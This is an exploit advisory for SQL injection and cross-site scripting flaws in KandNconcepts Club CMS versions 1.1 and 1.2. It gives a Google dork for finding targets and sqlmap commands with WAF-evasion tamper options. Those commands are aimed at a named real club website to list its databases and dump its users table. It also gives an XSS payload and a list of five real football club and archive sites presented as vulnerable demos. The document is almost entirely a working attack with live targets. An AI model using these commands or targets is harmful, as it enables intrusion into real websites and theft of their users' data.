# Exploit Title: KandNconcepts Club CMS 1.x SQL Injection & XSS Vulnerability
# Google Dork:intext:"K & N Concepts Ltd"
# Date: 2020-03-31
# Exploit Author: @ThelastVvV
# Vendor Homepage:https://it-it.facebook.com/kandnconcepts / kandnconcepts.co.uk
# Version: 1.1&1.2
# Tested on: Ubuntu

---------------------------------------------------------

PoC 1:
The attacker once locate the sql  vulnerability can perform an automated process to exploit the secruity in the webapp 
Payload(s)

http://www.site.com/content.php?Id=[]'[SQL INJECTION VULNERABILITY!]

SQLMAP Payload(s):

sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D thursounited_co --tables

sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D thursounited_co -T tufc_users        




PoC 2 :

XSS Vulnerability

Payload(s) :

"><img src=x onerror=prompt(document.domain);>

use payload:
http://www.thursounited.co.uk/team.php?id=1%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E

www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>



Demos:

http://www.thursounited.co.uk/team.php?id=1'
https://www.nairncountyarchive.co.uk/player.php?id=11'
https://clydebankfc.co.uk/player.php?id=364'
http://www.wick-academy.co.uk/playerstats/player.php?id=304'
http://northcaleyfa.com/club.php?id=42'